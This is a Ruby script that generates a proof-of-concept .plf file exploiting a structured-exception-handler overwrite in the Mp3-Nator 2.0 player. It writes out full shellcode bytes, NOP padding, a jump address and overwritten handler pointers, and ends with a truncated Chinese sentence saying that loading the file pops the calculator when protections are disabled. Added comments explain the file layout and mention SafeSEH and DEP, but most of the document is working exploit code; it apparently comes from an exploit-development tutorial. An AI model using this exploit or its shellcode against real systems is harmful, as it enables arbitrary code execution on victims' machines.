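# Generator for the Mp3-Nator 2.0 .plf proof-of-concept file discussed on this page.
# It only concatenates the byte sequences already given here and writes them to disk;
# the surrounding text states that loading the resulting file pops the calculator.
#
# File layout, in write order (sizes follow from the expressions below):
#   nop1        28 bytes of 0x90
#   jmp1         4 bytes, little-endian 0x7E429353
#   nop2       224 bytes of 0x90
#   shellcode  223 bytes (opaque payload, reproduced as given on the page)
#   nop3      3629 bytes of 0x90
#   nSEH         4 bytes, 0xFFFFFFFF (the "next SEH" slot of the overwritten record)
#   SEH          4 bytes, little-endian 0x10019C35 (the handler pointer that is overwritten;
#                which module this address belongs to is not stated on this page)
#
# Defensive reading: a ~4116-byte .plf that is mostly 0x90 padding with a fixed handler
# address at its tail is the classic SEH-overwrite shape that SafeSEH/SEHOP and DEP are
# designed to break; the (truncated) sentence following the script qualifies the result
# with a protection that was not enabled in the demonstration.

filename = 'exploit_no_dep_by_xiaot8267.plf'

# All buffers are forced to BINARY: in Ruby 1.9+ a "\x90" literal carries the source
# file's encoding while Array#pack returns ASCII-8BIT, and concatenating two non-ASCII
# strings of different encodings raises Encoding::CompatibilityError.
shellcode = ("\x33\xc9\xb8\xd1\xa3\x3d\x27\xda\xdf\xd9\x74\x24\xf4\xb1" +
             "\x32\x5a\x83\xc2\x04\x31\x42\x0c\x03\x93\xaf\xdf\xd2\xef" +
             "\x58\x96\x1d\x0f\x99\xc9\x94\xea\xa8\xdb\xc3\x7f\x98\xeb" +
             "\x80\x2d\x11\x87\xc5\xc5\xa2\xe5\xc1\xea\x03\x43\x34\xc5" +
             "\x94\x65\xf8\x89\x57\xe7\x84\xd3\x8b\xc7\xb5\x1c\xde\x06" +
             "\xf1\x40\x11\x5a\xaa\x0f\x80\x4b\xdf\x4d\x19\x6d\x0f\xda" +
             "\x21\x15\x2a\x1c\xd5\xaf\x35\x4c\x46\xbb\x7e\x74\xec\xe3" +
             "\x5e\x85\x21\xf0\xa3\xcc\x4e\xc3\x50\xcf\x86\x1d\x98\xfe" +
             "\xe6\xf2\xa7\xcf\xea\x0b\xef\xf7\x14\x7e\x1b\x04\xa8\x79" +
             "\xd8\x77\x76\x0f\xfd\xdf\xfd\xb7\x25\xde\xd2\x2e\xad\xec" +
             "\x9f\x25\xe9\xf0\x1e\xe9\x81\x0c\xaa\x0c\x46\x85\xe8\x2a" +
             "\x42\xce\xab\x53\xd3\xaa\x1a\x6b\x03\x12\xc2\xc9\x4f\xb0" +
             "\x17\x6b\x12\xde\xe6\xf9\x28\xa7\xe9\x01\x33\x87\x81\x30" +
             "\xb8\x48\xd5\xcc\x6b\x2d\x27\x3c\xa6\xbb\xb0\xe7\x53\x86" +
             "\xdc\x17\x8e\xc4\xd8\x9b\x3b\xb4\x1e\x83\x49\xb1\x5b\x03" +
             "\xa1\xcb\xf4\xe6\xc5\x78\xf4\x22\xa6\x1f\x66\xae\x29").b

nop1 = ("\x90" * 28).b
jmp1 = [0x7E429353].pack('V')          # 4 bytes, little-endian, written right after nop1
nop2 = ("\x90" * (256 - 32)).b
nop3 = ("\x90" * (4108 - 479)).b
nSEH = [0xFFFFFFFF].pack('V')          # value landing in the "next SEH" pointer slot
SEH  = [0x10019C35].pack('V')          # value landing in the exception-handler pointer slot

# Original listing spelled this `playload`; it is a local with no external users.
payload = nop1 + jmp1 + nop2 + shellcode + nop3 + nSEH + SEH

# 'wb' keeps the bytes verbatim (no newline translation, no transcoding). The collapsed
# listing on this page had the block's `File.open ... do |fd|` opener placed after its
# `end`, so the script as shown did not parse; the block is restored in its natural order.
File.open(filename, 'wb') do |fd|
  fd.write payload
end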
最后用 Mp3-Nator 2.0 加载构造的文件就会弹出计算器程序，当然这是在程序没有启用